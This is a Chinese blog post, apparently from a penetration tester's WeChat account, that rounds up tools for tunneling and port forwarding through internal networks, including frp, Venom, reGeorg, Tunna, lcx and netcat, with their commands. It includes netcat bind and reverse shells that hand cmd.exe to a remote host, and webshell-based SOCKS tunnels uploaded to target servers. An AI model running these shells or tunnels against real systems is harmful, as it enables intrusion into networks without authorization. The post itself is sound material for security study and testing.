代理与转发常用工具汇总

  • A+
所属分类:安全工具 安全文章

自己对内网渗透搭建链路上很不熟练,乘着出差路上测试一下,有不当之处多多指正。好久不发文了,居然有付费阅读了,借此机会测试一下,内容比较粗糙,后期在全文发。相关工具在后台回复“01代理转发”可以获取下载链接。

内网穿透工具

frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

https://github.com/fatedier/frp

参考链接

https://sspai.com/post/52523


服务端frps.exe -c frps.ini客户端frps.exe -c frpc.ini
[common]server_addr = xxxserver_port = 7000auth_token = {auth_token}privilege_token = {privilege_token}
[http]type = httplocal_ip = 127.0.0.1local_port = 80
[https]type = httpslocal_ip = 127.0.0.1local_port = 443
[ssh]type = tcplocal_port = 22remote_port = 5555

可以把22端口代理出去成为5555端口


nps

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理p2p等,并带有功能强大的web管理端。

https://github.com/ehang-io/nps/blob/master/README_zh.md

代理工具

Termite

是EW(EarthWorm)的最新版,

官方链接:http://rootkiter.com/Termite/

其他的作用都很好就是起代理的时候没有测试成功,不知道为什么

Venom

https://github.com/Dliv3/Venom

这个比较好用

在本地


./admin_macos_x64 -lport 9999


在跳板机


./agent_linux_x64 -rhost 192.168.0.103 -rport 9999


然后在本地就可以socks代理

本地代理客户段可以使用

冰蝎(测试成功)

通过冰蝎的内网穿透功能可以起socks代理,测试成功。

reGeorg (测试成功)

工具地址:https://github.com/sensepost/reGeorg

reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https   隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个   socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。


 python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp


Tunna

https://github.com/SECFORCE/Tunna

一个很老的代理工具了,同样需要把文件上传到目标的web服务器上。


python proxy.py  -u http://192.168.255.161/3.php -l 1234


需要目标服务器开启socket扩展。

转发工具

windows

lcx.exe(没有测试成功)

第一种用法:


 1.1.1.1: lcx -listen 1111 2222 2.2.2.2: lcx -slave 1.1.1.1 1111 3.3.3.3 3389


然后,其他机器访问1.1.1.1的2222端口,就相当于访问了3.3.3.3的3389端口。

第二种用法:


 1.1.1.1: lcx -tran 2222 2.2.2.2 3389


然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。

nc(测试成功)

第一种用法:正向连接

在内网主机(1.1.1.1)上执行


1.1.1.1   nc -l -p 4444 -t -e cmd.exe


公网主机(2.2.2.2)上远程连接

nc 1.1.1.1 4444

telnet 1.1.1.1 4444

第二种用法:反向连接

在公网主机(2.2.2.2)上监听端口:


2.2.2.2 nc -lvp 4444


在内网主机(1.1.1.1)上远程回连:


nc -t -e cmd.exe 公网主机ip 4444


linux

portmap

先在具有公网ip的主机上执行:


./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777

本文始发于微信公众号(无级安全):代理与转发常用工具汇总

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: